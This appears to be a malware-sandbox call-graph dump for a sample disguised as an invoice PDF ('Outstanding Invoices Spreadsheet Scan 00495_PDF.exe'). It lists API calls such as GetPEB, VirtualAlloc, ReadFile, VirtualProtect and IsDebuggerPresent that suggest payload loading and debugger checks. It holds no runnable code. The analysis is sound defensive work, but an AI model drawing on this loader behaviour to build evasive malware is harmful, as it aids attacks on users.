86191 41b843 GetFileType 86191->86192 86192->86187 86192->86188 86192->86190 86192->86191 86265 4189e6 InitializeCriticalSectionAndSpinCount __setmode 86192->86265 86193->86187 86193->86189 86193->86192 86194 41b77e 86193->86194 86194->86187 86194->86192 86195 41b7a7 GetFileType 86194->86195 86264 4189e6 InitializeCriticalSectionAndSpinCount __setmode 86194->86264 86195->86194 86199 422370 86198->86199 86200 422374 86198->86200 86199->86126 86201 416fb6 __malloc_crt 67 API calls 86200->86201 86202 422395 _realloc 86201->86202 86203 42239c FreeEnvironmentStringsW 86202->86203 86203->86126 86205 4222e6 _wparse_cmdline 86204->86205 86206 416fb6 __malloc_crt 67 API calls 86205->86206 86207 422329 _wparse_cmdline 86205->86207 86206->86207 86207->86129 86210 42209a _wcslen 86208->86210 86213 416267 86208->86213 86209 416ffb __calloc_crt 67 API calls 86218 4220be _wcslen 86209->86218 86210->86209 86211 422123 86212 413a88 __read_nolock 67 API calls 86211->86212 86212->86213 86213->86134 86254 4117af 67 API calls 3 library calls 86213->86254 86214 416ffb __calloc_crt 67 API calls 86214->86218 86215 422149 86216 413a88 __read_nolock 67 API calls 86215->86216 86216->86213 86218->86211 86218->86213 86218->86214 86218->86215 86219 422108 86218->86219 86266 426349 67 API calls __setmode 86218->86266 86219->86218 86267 417d93 10 API calls 3 library calls 86219->86267 86222 41187c __IsNonwritableInCurrentImage 86221->86222 86268 418486 86222->86268 86224 41189a __initterm_e 86225 411421 __cinit 74 API calls 86224->86225 86226 4118b9 __IsNonwritableInCurrentImage __initterm 86224->86226 86225->86226 86226->86137 86228 431bcb 86227->86228 86229 40d80c 86227->86229 86230 4092c0 VariantClear 86229->86230 86231 40d847 86230->86231 86272 40eb50 86231->86272 86234 40d877 86275 411ac6 67 API calls 4 library calls 86234->86275 86237 40d888 86276 411b24 67 API calls __setmode 86237->86276 86239 40d891 86277 40f370 SystemParametersInfoW SystemParametersInfoW 86239->86277 86241 40d89f 86278 
40d6d0 GetCurrentDirectoryW 86241->86278 86243 40d8a7 SystemParametersInfoW 86244 40d8d4 86243->86244 86245 40d8cd FreeLibrary 86243->86245 86246 4092c0 VariantClear 86244->86246 86245->86244 86247 40d8dd 86246->86247 86248 4092c0 VariantClear 86247->86248 86249 40d8e6 86248->86249 86249->86142 86256 411a1f 67 API calls _doexit 86249->86256 86250->86118 86251->86119 86252->86127 86253->86130 86254->86134 86255->86139 86256->86142 86257->86145 86258->86157 86259->86163 86260->86173 86261->86182 86262->86159 86263->86185 86264->86194 86265->86192 86266->86218 86267->86219 86269 41848c 86268->86269 86270 41696e __encode_pointer 6 API calls 86269->86270 86271 4184a4 86269->86271 86270->86269 86271->86224 86316 40eb70 86272->86316 86275->86237 86276->86239 86277->86241 86320 401f80 86278->86320 86280 40d6f1 IsDebuggerPresent 86281 431a9d MessageBoxA 86280->86281 86282 40d6ff 86280->86282 86283 431ab6 86281->86283 86282->86283 86284 40d71f 86282->86284 86422 403e90 75 API calls 3 library calls 86283->86422 86390 40f3b0 86284->86390 86288 40d73a GetFullPathNameW 86420 401440 127 API calls _wcscat 86288->86420 86290 40d77a 86291 40d782 86290->86291 86292 431b09 SetCurrentDirectoryW 86290->86292 86293 40d78b 86291->86293 86423 43604b 6 API calls 86291->86423 86292->86291 86402 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86293->86402 86296 431b28 86296->86293 86298 431b30 GetModuleFileNameW 86296->86298 86301 431ba4 GetForegroundWindow ShellExecuteW 86298->86301 86302 431b4c 86298->86302 86300 40d795 86310 40d7a8 86300->86310 86410 40e1e0 86300->86410 86303 40d7c7 86301->86303 86424 401b70 86302->86424 86308 40d7d1 SetCurrentDirectoryW 86303->86308 86308->86243 86309 431b66 86431 40d3b0 75 API calls 2 library calls 86309->86431 86310->86303 86421 401000 Shell_NotifyIconW _memset 86310->86421 86313 431b72 GetForegroundWindow ShellExecuteW 86314 431b9f 86313->86314 86314->86303 86315 40eba0 LoadLibraryA GetProcAddress 86315->86234 86317 40d86e 
86316->86317 86318 40eb76 LoadLibraryA 86316->86318 86317->86234 86317->86315 86318->86317 86319 40eb87 GetProcAddress 86318->86319 86319->86317 86432 40e680 86320->86432 86324 401fa2 GetModuleFileNameW 86450 40ff90 86324->86450 86326 401fbd 86462 4107b0 86326->86462 86329 401b70 75 API calls 86330 401fe4 86329->86330 86465 4019e0 86330->86465 86332 401ff2 86333 4092c0 VariantClear 86332->86333 86334 402002 86333->86334 86335 401b70 75 API calls 86334->86335 86336 40201c 86335->86336 86337 4019e0 76 API calls 86336->86337 86338 40202c 86337->86338 86339 401b70 75 API calls 86338->86339 86340 40203c 86339->86340 86473 40c3e0 86340->86473 86342 40204d 86491 40c060 86342->86491 86346 40206e 86503 4115d0 86346->86503 86349 42c174 86352 401a70 75 API calls 86349->86352 86350 402088 86351 4115d0 __wcsicoll 79 API calls 86350->86351 86354 402093 86351->86354 86353 42c189 86352->86353 86356 401a70 75 API calls 86353->86356 86354->86353 86355 40209e 86354->86355 86357 4115d0 __wcsicoll 79 API calls 86355->86357 86358 42c1a7 86356->86358 86359 4020a9 86357->86359 86360 42c1b0 GetModuleFileNameW 86358->86360 86359->86360 86361 4020b4 86359->86361 86363 401a70 75 API calls 86360->86363 86362 4115d0 __wcsicoll 79 API calls 86361->86362 86364 4020bf 86362->86364 86365 42c1e2 86363->86365 86366 402107 86364->86366 86369 42c20a _wcscpy 86364->86369 86372 401a70 75 API calls 86364->86372 86515 40df50 86365->86515 86368 402119 86366->86368 86366->86369 86371 42c243 86368->86371 86511 40e7e0 76 API calls 86368->86511 86377 401a70 75 API calls 86369->86377 86375 4020e5 _wcscpy 86372->86375 86373 401a70 75 API calls 86376 42c201 86373->86376 86381 401a70 75 API calls 86375->86381 86376->86369 86385 402148 86377->86385 86378 402132 86512 40d030 76 API calls 86378->86512 86380 40213e 86382 4092c0 VariantClear 86380->86382 86381->86366 86382->86385 86383 402184 86387 4092c0 VariantClear 86383->86387 86385->86383 86388 401a70 75 API calls 86385->86388 86513 40d030 76 API calls 86385->86513 
86514 40e640 76 API calls 86385->86514 86389 402196 ctype 86387->86389 86388->86385 86389->86280 86391 42ccf4 _memset 86390->86391 86392 40f3c9 86390->86392 86394 42cd05 GetOpenFileNameW 86391->86394 86603 40ffb0 76 API calls ctype 86392->86603 86394->86392 86396 40d732 86394->86396 86395 40f3d2 86604 410130 SHGetMalloc 86395->86604 86396->86288 86396->86290 86398 40f3d9 86609 410020 88 API calls __wcsicoll 86398->86609 86400 40f3e7 86610 40f400 86400->86610 86403 42b9d3 86402->86403 86404 41025a LoadImageW RegisterClassExW 86402->86404 86662 443e8f EnumResourceNamesW LoadImageW 86403->86662 86661 4102f0 7 API calls 86404->86661 86407 40d790 86409 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86407->86409 86408 42b9da 86409->86300 86412 40e207 _memset 86410->86412 86411 40e262 86414 40e2a4 86411->86414 86685 43737d 84 API calls __wcsicoll 86411->86685 86412->86411 86413 42aa14 DestroyIcon 86412->86413 86413->86411 86416 40e2c0 Shell_NotifyIconW 86414->86416 86417 42aa50 Shell_NotifyIconW 86414->86417 86663 401be0 86416->86663 86419 40e2da 86419->86310 86420->86290 86421->86303 86422->86290 86423->86296 86425 401b76 _wcslen 86424->86425 86426 41171a 75 API calls 86425->86426 86428 401bc5 86425->86428 86427 401bad _realloc 86426->86427 86429 41171a 75 API calls 86427->86429 86430 40d3b0 75 API calls 2 library calls 86428->86430 86429->86428 86430->86309 86431->86313 86433 40c060 75 API calls 86432->86433 86434 401f90 86433->86434 86435 402940 86434->86435 86436 40294a __write_nolock 86435->86436 86519 4021e0 86436->86519 86439 402972 86449 4029a4 86439->86449 86531 401cf0 86439->86531 86441 402a8c 86442 401b70 75 API calls 86441->86442 86448 402abe 86441->86448 86444 402ab3 86442->86444 86443 401b70 75 API calls 86443->86449 86542 40d970 75 API calls 2 library calls 86444->86542 86446 401cf0 75 API calls 86446->86449 86448->86324 86449->86441 86449->86443 86449->86446 86534 402ae0 86449->86534 86541 40d970 75 API calls 2 library calls 86449->86541 
86451 40f5e0 152 API calls 86450->86451 86452 40ff9e 86451->86452 86453 40ffa6 86452->86453 86552 452574 86452->86552 86453->86326 86455 42b6d8 86456 42b6e6 86455->86456 86457 434fe1 106 API calls 86455->86457 86458 413a88 __read_nolock 67 API calls 86456->86458 86457->86456 86459 42b6f5 86458->86459 86460 434fe1 106 API calls 86459->86460 86461 42b702 86460->86461 86461->86326 86463 41171a 75 API calls 86462->86463 86464 401fd6 86463->86464 86464->86329 86466 401a03 86465->86466 86471 4019e5 86465->86471 86467 401a1a 86466->86467 86466->86471 86591 404260 76 API calls 86467->86591 86469 4019ff 86469->86332 86470 401a26 86470->86332 86471->86469 86590 404260 76 API calls 86471->86590 86474 40c3e4 86473->86474 86475 40c42c 86473->86475 86478 40c3f0 86474->86478 86479 42a475 86474->86479 86476 42a422 86475->86476 86477 40c435 86475->86477 86483 42a427 86476->86483 86484 42a445 86476->86484 86480 40c441 86477->86480 86481 42a455 86477->86481 86592 4042f0 75 API calls __cinit 86478->86592 86597 453155 75 API calls 86479->86597 86593 4042f0 75 API calls __cinit 86480->86593 86596 453155 75 API calls 86481->86596 86490 40c3fb 86483->86490 86594 453155 75 API calls 86483->86594 86595 453155 75 API calls 86484->86595 86490->86342 86490->86490 86492 41171a 75 API calls 86491->86492 86493 40c088 86492->86493 86494 41171a 75 API calls 86493->86494 86495 402061 86494->86495 86496 401a70 86495->86496 86497 401a90 86496->86497 86498 401a77 86496->86498 86500 4021e0 75 API calls 86497->86500 86499 401a8d 86498->86499 86598 404080 75 API calls _realloc 86498->86598 86499->86346 86501 401a9c 86500->86501 86501->86346 86504 4115e1 86503->86504 86505 411650 86503->86505 86510 40207d 86504->86510 86599 417f23 67 API calls __getptd_noexit 86504->86599 86601 4114bf 79 API calls 3 library calls 86505->86601 86508 4115ed 86600 417ebb 6 API calls 2 library calls 86508->86600 86510->86349 86510->86350 86511->86378 86512->86380 86513->86385 86514->86385 86516 40df61 86515->86516 86517 40df56 
86515->86517 86516->86373 86602 404080 75 API calls _realloc 86517->86602 86520 4021f1 _wcslen 86519->86520 86521 42a598 86519->86521 86524 402205 86520->86524 86525 402226 86520->86525 86547 40c740 86521->86547 86523 42a5a2 86543 404020 75 API calls ctype 86524->86543 86544 401380 86525->86544 86529 40220c _realloc 86529->86439 86530 41171a 75 API calls 86530->86529 86532 402ae0 75 API calls 86531->86532 86533 401cf7 86532->86533 86533->86439 86535 42a06a 86534->86535 86536 402aef 86534->86536 86537 401380 75 API calls 86535->86537 86536->86449 86538 42a072 86537->86538 86539 41171a 75 API calls 86538->86539 86540 42a095 _realloc 86539->86540 86540->86449 86541->86449 86542->86448 86543->86529 86545 41171a 75 API calls 86544->86545 86546 401387 86545->86546 86546->86523 86546->86530 86548 40c752 86547->86548 86549 40c747 86547->86549 86548->86523 86549->86548 86550 402ae0 75 API calls 86549->86550 86551 42a572 _realloc 86550->86551 86551->86523 86553 41557c _fseek 105 API calls 86552->86553 86554 4525df 86553->86554 86555 4523ce 114 API calls 86554->86555 86556 4525f8 86555->86556 86557 4525fc 86556->86557 86558 4151b0 __fread_nolock 81 API calls 86556->86558 86557->86455 86559 45261d 86558->86559 86560 4151b0 __fread_nolock 81 API calls 86559->86560 86561 45262e 86560->86561 86562 4151b0 __fread_nolock 81 API calls 86561->86562 86563 452649 86562->86563 86564 4151b0 __fread_nolock 81 API calls 86563->86564 86565 452666 86564->86565 86566 41557c _fseek 105 API calls 86565->86566 86567 452682 86566->86567 86568 4138ba _malloc 67 API calls 86567->86568 86569 45268e 86568->86569 86570 4138ba _malloc 67 API calls 86569->86570 86571 45269b 86570->86571 86572 4151b0 __fread_nolock 81 API calls 86571->86572 86573 4526ac 86572->86573 86574 44afdc GetSystemTimeAsFileTime 86573->86574 86575 4526bf 86574->86575 86576 4526d5 86575->86576 86577 4526fd 86575->86577 86578 413a88 __read_nolock 67 API calls 86576->86578 86579 452704 86577->86579 86580 45275b 86577->86580 86581 
4526df 86578->86581 86589 44b195 139 API calls __fcloseall 86579->86589 86583 413a88 __read_nolock 67 API calls 86580->86583 86585 413a88 __read_nolock 67 API calls 86581->86585 86584 452759 86583->86584 86584->86455 86587 4526e8 86585->86587 86586 452753 86588 413a88 __read_nolock 67 API calls 86586->86588 86587->86455 86588->86584 86589->86586 86590->86469 86591->86470 86592->86490 86593->86490 86594->86490 86595->86481 86596->86490 86597->86490 86598->86499 86599->86508 86601->86510 86602->86516 86603->86395 86605 410148 SHGetDesktopFolder 86604->86605 86608 4101a3 _wcscpy 86604->86608 86606 41015a _wcscpy 86605->86606 86605->86608 86607 41018a SHGetPathFromIDListW 86606->86607 86606->86608 86607->86608 86608->86398 86609->86400 86611 40f5e0 152 API calls 86610->86611 86612 40f417 86611->86612 86613 42ca37 86612->86613 86614 40f42c 86612->86614 86615 42ca1f 86612->86615 86616 452574 140 API calls 86613->86616 86655 4037e0 139 API calls 7 library calls 86614->86655 86656 43717f 110 API calls _printf 86615->86656 86619 42ca50 86616->86619 86620 42ca76 86619->86620 86621 42ca54 86619->86621 86625 41171a 75 API calls 86620->86625 86624 434fe1 106 API calls 86621->86624 86622 40f446 86622->86396 86623 42ca2d 86623->86613 86626 42ca5e 86624->86626 86631 42cacc ctype 86625->86631 86657 43717f 110 API calls _printf 86626->86657 86628 42ca6c 86628->86620 86629 42ccc3 86630 413a88 __read_nolock 67 API calls 86629->86630 86632 42cccd 86630->86632 86631->86629 86638 401b70 75 API calls 86631->86638 86641 402cc0 86631->86641 86649 4026a0 86631->86649 86658 445051 75 API calls _realloc 86631->86658 86659 44c80c 87 API calls 3 library calls 86631->86659 86660 44b408 75 API calls 86631->86660 86633 434fe1 106 API calls 86632->86633 86634 42ccda 86633->86634 86638->86631 86642 402d71 86641->86642 86648 402cd2 _realloc ctype 86641->86648 86645 41171a 75 API calls 86642->86645 86643 41171a 75 API calls 86644 402cd9 86643->86644 86646 402cff 86644->86646 86647 41171a 75 API calls 
86644->86647 86645->86648 86646->86631 86647->86646 86648->86643 86650 4026af 86649->86650 86652 40276b 86649->86652 86651 41171a 75 API calls 86650->86651 86650->86652 86653 4026ee ctype 86650->86653 86651->86653 86652->86631 86653->86652 86654 41171a 75 API calls 86653->86654 86654->86653 86655->86622 86656->86623 86657->86628 86658->86631 86659->86631 86660->86631 86661->86407 86662->86408 86664 401bfb 86663->86664 86684 401cde 86663->86684 86686 4013a0 86664->86686 86667 42a9a0 LoadStringW 86670 42a9bb 86667->86670 86668 401c18 86669 4021e0 75 API calls 86668->86669 86671 401c2d 86669->86671 86672 40df50 75 API calls 86670->86672 86673 401c3a 86671->86673 86674 42a9cd 86671->86674 86680 401c53 _memset _wcscpy _wcsncpy 86672->86680 86673->86670 86675 401c44 86673->86675 86692 40d3b0 75 API calls 2 library calls 86674->86692 86691 40d3b0 75 API calls 2 library calls 86675->86691 86678 42a9dc 86679 42a9f0 86678->86679 86678->86680 86693 40d3b0 75 API calls 2 library calls 86679->86693 86683 401cc2 Shell_NotifyIconW 86680->86683 86682 42a9fe 86683->86684 86684->86419 86685->86414 86687 41171a 75 API calls 86686->86687 86688 4013c4 86687->86688 86689 401380 75 API calls 86688->86689 86690 4013d3 86689->86690 86690->86667 86690->86668 86691->86680 86692->86678 86693->86682 84965 2e54400 84979 2e52050 84965->84979 84967 2e544da 84982 2e542f0 84967->84982 84969 2e54503 CreateFileW 84971 2e54557 84969->84971 84972 2e54552 84969->84972 84971->84972 84973 2e5456e VirtualAlloc 84971->84973 84973->84972 84974 2e5458c ReadFile 84973->84974 84974->84972 84975 2e545a7 84974->84975 84976 2e532f0 13 API calls 84975->84976 84978 2e545da 84976->84978 84977 2e545fd ExitProcess 84977->84972 84978->84977 84985 2e55500 GetPEB 84979->84985 84981 2e526db 84981->84967 84983 2e542f9 Sleep 84982->84983 84984 2e54307 84983->84984 84986 2e5552a 84985->84986 84986->84981 86694 40ab16 86695 40ab50 86694->86695 86696 41171a 75 API calls 86695->86696 86703 40ab9e ctype 86696->86703 86697 40ac10 
86698 42f332 86697->86698 86700 40ac53 ctype 86697->86700 86735 45e62e 116 API calls 3 library calls 86698->86735 86701 40ac5f ctype 86700->86701 86706 4092c0 VariantClear 86700->86706 86702 42f2bd 86736 44b92e VariantClear 86702->86736 86703->86697 86703->86702 86704 40af91 86703->86704 86707 41171a 75 API calls 86703->86707 86708 42ebac VariantClear 86703->86708 86710 42ee49 VariantClear 86703->86710 86713 40c000 76 API calls 86703->86713 86714 40e380 VariantClear 86703->86714 86715 401b70 75 API calls 86703->86715 86718 409030 86703->86718 86733 452d91 VariantClear 86703->86733 86734 452d55 76 API calls 86703->86734 86732 409210 VariantClear 86704->86732 86706->86700 86707->86703 86708->86703 86710->86703 86711 42f3ae 86713->86703 86714->86703 86715->86703 86737 409110 117 API calls 86718->86737 86720 42ceb6 86746 410ae0 VariantClear ctype 86720->86746 86722 40906e 86722->86720 86724 42cea9 86722->86724 86726 4090a4 86722->86726 86723 42cebf 86745 45e62e 116 API calls 3 library calls 86724->86745 86738 404160 86726->86738 86729 4090f0 ctype 86729->86703 86730 4092c0 VariantClear 86731 4090be ctype 86730->86731 86731->86729 86731->86730 86732->86700 86733->86703 86734->86703 86735->86702 86736->86711 86737->86722 86739 4092c0 VariantClear 86738->86739 86740 40416e 86739->86740 86741 404120 VariantClear 86740->86741 86742 40419b 86741->86742 86747 4734b7 86742->86747 86743 4041c6 86743->86720 86743->86731 86745->86720 86746->86723 86748 453063 111 API calls 86747->86748 86749 4734d7 86748->86749 86750 473545 86749->86750 86751 47350c 86749->86751 86791 463c42 86750->86791 86752 4092c0 VariantClear 86751->86752 86759 473514 86752->86759 86754 473558 86755 47355c 86754->86755 86772 473595 86754->86772 86756 4092c0 VariantClear 86755->86756 86765 473564 86756->86765 86757 473616 86804 463d7e 86757->86804 86759->86743 86760 473622 86762 473697 86760->86762 86763 47362c 86760->86763 86761 453063 111 API calls 86761->86772 86838 457838 86762->86838 86766 4092c0 
VariantClear 86763->86766 86765->86743 86769 473634 86766->86769 86769->86743 86771 473655 86774 4092c0 VariantClear 86771->86774 86772->86757 86772->86761 86772->86771 86850 462f5a 87 API calls __wcsicoll 86772->86850 86785 47365d 86774->86785 86775 4736b0 86851 45e62e 116 API calls 3 library calls 86775->86851 86776 4736c9 86852 40e7e0 76 API calls 86776->86852 86779 4736ba GetCurrentProcess TerminateProcess 86779->86776 86780 4736db 86787 4736ff 86780->86787 86853 40d030 76 API calls 86780->86853 86781 473731 86788 473744 FreeLibrary 86781->86788 86789 47374b 86781->86789 86783 4736f1 86854 46b945 134 API calls 2 library calls 86783->86854 86785->86743 86787->86781 86855 40d030 76 API calls 86787->86855 86856 46b945 134 API calls 2 library calls 86787->86856 86788->86789 86789->86743 86857 45335b 76 API calls 86791->86857 86793 463c5d 86858 442c52 80 API calls _wcslen 86793->86858 86795 463c72 86797 40c060 75 API calls 86795->86797 86803 463cac 86795->86803 86798 463c8e 86797->86798 86859 4608ce 75 API calls _realloc 86798->86859 86800 463ca4 86802 40c740 75 API calls 86800->86802 86801 463cf7 86801->86754 86802->86803 86803->86801 86860 462f5a 87 API calls __wcsicoll 86803->86860 86805 453063 111 API calls 86804->86805 86806 463d99 86805->86806 86807 463de0 86806->86807 86808 463dca 86806->86808 86861 40c760 78 API calls 86807->86861 86809 453081 111 API calls 86808->86809 86811 463dd0 LoadLibraryW 86809->86811 86813 463e09 86811->86813 86812 463de7 86817 463e19 86812->86817 86862 40c760 78 API calls 86812->86862 86815 463e3e 86813->86815 86813->86817 86818 463e4e 86815->86818 86819 463e7b 86815->86819 86816 463dfb 86816->86817 86863 40c760 78 API calls 86816->86863 86817->86760 86864 40d500 75 API calls 86818->86864 86866 40c760 78 API calls 86819->86866 86823 463e57 86865 45efe7 77 API calls ctype 86823->86865 86824 463e82 GetProcAddress 86827 463e90 86824->86827 86826 463e62 GetProcAddress 86829 463e79 86826->86829 86827->86817 86828 463edf 86827->86828 
86827->86829 86828->86817 86832 463eef FreeLibrary 86828->86832 86829->86827 86867 403470 75 API calls _realloc 86829->86867 86831 463eb4 86868 40d500 75 API calls 86831->86868 86832->86817 86834 463ebd 86869 45efe7 77 API calls ctype 86834->86869 86836 463ec8 GetProcAddress 86870 401330 ctype 86836->86870 86839 457a4c 86838->86839 86845 45785f _strcat _wcslen _wcscpy ctype 86838->86845 86846 410d40 86839->86846 86840 40c760 78 API calls 86840->86845 86841 453081 111 API calls 86841->86845 86842 443576 78 API calls 86842->86845 86843 4138ba 67 API calls _malloc 86843->86845 86844 40f580 77 API calls 86844->86845 86845->86839 86845->86840 86845->86841 86845->86842 86845->86843 86845->86844 86848 410d55 86846->86848 86847 410ded VirtualProtect 86849 410dbb 86847->86849 86848->86847 86848->86849 86849->86775 86849->86776 86850->86772 86851->86779 86852->86780 86853->86783 86854->86787 86855->86787 86856->86787 86857->86793 86858->86795 86859->86800 86860->86801 86861->86812 86862->86816 86863->86813 86864->86823 86865->86826 86866->86824 86867->86831 86868->86834 86869->86836 86870->86828 86871 42919b 86876 40ef10 86871->86876 86874 411421 __cinit 74 API calls 86875 4291aa 86874->86875 86877 41171a 75 API calls 86876->86877 86878 40ef17 86877->86878 86879 42ad48 86878->86879 86884 40ef40 74 API calls __cinit 86878->86884 86881 40ef2a 86885 40e470 86881->86885 86884->86881 86886 40c060 75 API calls 86885->86886 86887 40e483 GetVersionExW 86886->86887 86888 4021e0 75 API calls 86887->86888 86889 40e4bb 86888->86889 86911 40e600 86889->86911 86894 42accc 86897 42ad28 GetSystemInfo 86894->86897 86900 42ad38 GetSystemInfo 86897->86900 86898 40e557 GetCurrentProcess 86931 40ee30 LoadLibraryA GetProcAddress 86898->86931 86899 40e56c 86899->86900 86924 40eee0 86899->86924 86904 40e5c9 86928 40eea0 86904->86928 86907 40e5e0 86909 40e5f1 FreeLibrary 86907->86909 86910 40e5f4 86907->86910 86908 40e5dd FreeLibrary 86908->86907 86909->86910 86910->86874 86912 40e60b 86911->86912 
86913 40c740 75 API calls 86912->86913 86914 40e4c2 86913->86914 86915 40e620 86914->86915 86916 40e62a 86915->86916 86917 42ac93 86916->86917 86918 40c740 75 API calls 86916->86918 86919 40e4ce 86918->86919 86919->86894 86920 40ee70 86919->86920 86921 40e551 86920->86921 86922 40ee76 LoadLibraryA 86920->86922 86921->86898 86921->86899 86922->86921 86923 40ee87 GetProcAddress 86922->86923 86923->86921 86925 40e5bf 86924->86925 86926 40eee6 LoadLibraryA 86924->86926 86925->86897 86925->86904 86926->86925 86927 40eef7 GetProcAddress 86926->86927 86927->86925 86932 40eec0 LoadLibraryA GetProcAddress 86928->86932 86930 40e5d3 GetNativeSystemInfo 86930->86907 86930->86908 86931->86899 86932->86930 84987 46caaa 84988 46cac6 84987->84988 84989 46cad1 84987->84989 85132 40c760 78 API calls 84988->85132 85128 453063 84989->85128 84992 46cd92 84993 46cae0 84993->84992 84994 46caed 84993->84994 84995 46cbeb 84993->84995 84996 453081 111 API calls 84994->84996 85037 40f5e0 84995->85037 85006 46caf8 _wcscpy _wcschr 84996->85006 84999 46cc13 85056 453081 84999->85056 85000 46cc01 85139 404120 85000->85139 85003 46cbc4 85135 4092c0 85003->85135 85004 46cc39 85062 413db0 85004->85062 85011 46cb16 _wcscat _wcscpy 85006->85011 85014 46cb44 _wcscat 85006->85014 85008 46cbd0 85009 453081 111 API calls 85010 46cb5e _wcscpy 85009->85010 85133 436ac4 GetFileAttributesW 85010->85133 85012 453081 111 API calls 85011->85012 85012->85014 85014->85009 85015 46cb79 _wcslen 85015->85003 85017 453081 111 API calls 85015->85017 85016 46cc3f _wcscat _wcscpy 85019 453081 111 API calls 85016->85019 85018 46cbae 85017->85018 85134 44bd29 103 API calls 4 library calls 85018->85134 85021 46cce4 85019->85021 85065 436879 85021->85065 85022 46cbb9 85022->84992 85022->85003 85024 46ccea 85072 436b22 85024->85072 85027 46cd02 85028 4092c0 VariantClear 85027->85028 85030 46cd46 85028->85030 85029 453081 111 API calls 85031 46cd1b 85029->85031 85143 434fe1 85030->85143 85075 452788 85031->85075 85034 46cd26 
85034->85030 85036 404120 VariantClear 85034->85036 85036->85027 85147 40f580 85037->85147 85039 40f5f8 _strcat ctype 85155 40f6d0 85039->85155 85044 42b2ee 85184 4151b0 85044->85184 85046 40f679 85046->85044 85047 40f681 85046->85047 85171 414e94 85047->85171 85051 40f68b 85051->84999 85051->85000 85053 42b31d 85190 415484 85053->85190 85055 42b33d 85057 4530aa 85056->85057 85059 45308c 85056->85059 85057->85004 85058 4530a1 85058->85004 85059->85058 85974 452e2a 111 API calls 5 library calls 85059->85974 85061 453098 85061->85004 85975 413b95 85062->85975 85066 436883 _wcschr __write_nolock 85065->85066 85067 4368a2 _wcscpy 85066->85067 85068 413db0 __wsplitpath 67 API calls 85066->85068 85067->85024 85069 4368df 85068->85069 85070 413db0 __wsplitpath 67 API calls 85069->85070 85071 436905 _wcscat _wcscpy 85070->85071 85071->85024 86005 436ade GetFileAttributesW 85072->86005 85074 436b2c 85074->85027 85074->85029 85076 452798 __write_nolock 85075->85076 85077 4431e0 GetSystemTimeAsFileTime 85076->85077 85078 4527ec 85077->85078 85079 41557c _fseek 105 API calls 85078->85079 85080 452801 85079->85080 85081 4528f1 85080->85081 85082 45281a 85080->85082 85084 4523ce 114 API calls 85081->85084 86027 4523ce 85082->86027 85100 4528b5 _wcscat 85084->85100 85086 45282d 85086->85034 85087 413db0 __wsplitpath 67 API calls 85092 452861 _wcscat _wcscpy 85087->85092 85088 4151b0 __fread_nolock 81 API calls 85089 452919 85088->85089 85090 4151b0 __fread_nolock 81 API calls 85089->85090 85091 45292a 85090->85091 85093 4151b0 __fread_nolock 81 API calls 85091->85093 85095 413db0 __wsplitpath 67 API calls 85092->85095 85094 452949 85093->85094 85096 4151b0 __fread_nolock 81 API calls 85094->85096 85095->85100 85097 45295a 85096->85097 85098 4151b0 __fread_nolock 81 API calls 85097->85098 85099 45297b 85098->85099 85101 4151b0 __fread_nolock 81 API calls 85099->85101 85100->85086 85100->85088 85102 45298c 85101->85102 85103 4151b0 __fread_nolock 81 API calls 85102->85103 85104 
45299d 85103->85104 85105 4151b0 __fread_nolock 81 API calls 85104->85105 85106 4529ae 85105->85106 86010 434fa9 GetTempPathW GetTempFileNameW 85106->86010 85108 4529be 85109 414e06 138 API calls 85108->85109 85123 4529d0 85109->85123 85110 4529db 85110->85034 85111 452aa3 85112 414e94 __fcloseall 106 API calls 85111->85112 85113 452aad 85112->85113 85114 452ad6 85113->85114 85115 452aba DeleteFileW 85113->85115 85116 452b6d CopyFileW 85114->85116 85121 452ae1 _wcscpy 85114->85121 85115->85034 85118 452b84 DeleteFileW 85116->85118 85119 452ba0 DeleteFileW 85116->85119 85117 4151b0 __fread_nolock 81 API calls 85117->85123 85118->85034 86024 434f66 CreateFileW 85119->86024 86033 44b195 139 API calls __fcloseall 85121->86033 85123->85110 85123->85111 85123->85117 86011 4146ce 85123->86011 85126 452b4d 85126->85119 85127 452b51 DeleteFileW 85126->85127 85127->85034 85129 45307a 85128->85129 85130 45306e 85128->85130 85129->84993 85130->85129 86052 452e2a 111 API calls 5 library calls 85130->86052 85132->84989 85133->85015 85134->85022 85136 4092c8 ctype 85135->85136 85137 429db0 VariantClear 85136->85137 85138 4092d5 ctype 85136->85138 85137->85138 85138->85008 85140 40412e 85139->85140 85141 4092c0 VariantClear 85140->85141 85142 404138 85141->85142 85142->85003 85144 434feb 85143->85144 85146 434ff1 85143->85146 85145 414e94 __fcloseall 106 API calls 85144->85145 85145->85146 85148 429440 85147->85148 85149 40f589 _wcslen 85147->85149 85150 40f58f WideCharToMultiByte 85149->85150 85151 40f5d8 85150->85151 85152 40f5ad 85150->85152 85151->85039 85153 41171a 75 API calls 85152->85153 85154 40f5bb WideCharToMultiByte 85153->85154 85154->85039 85156 40f6dd _strlen 85155->85156 85203 40f790 85156->85203 85159 414e06 85222 414d40 85159->85222 85161 40f666 85161->85044 85162 40f450 85161->85162 85166 40f45a _strcat _realloc __write_nolock 85162->85166 85163 4151b0 __fread_nolock 81 API calls 85163->85166 85165 42936d 85167 41557c _fseek 105 API calls 85165->85167 

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                              • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 0040D7D6
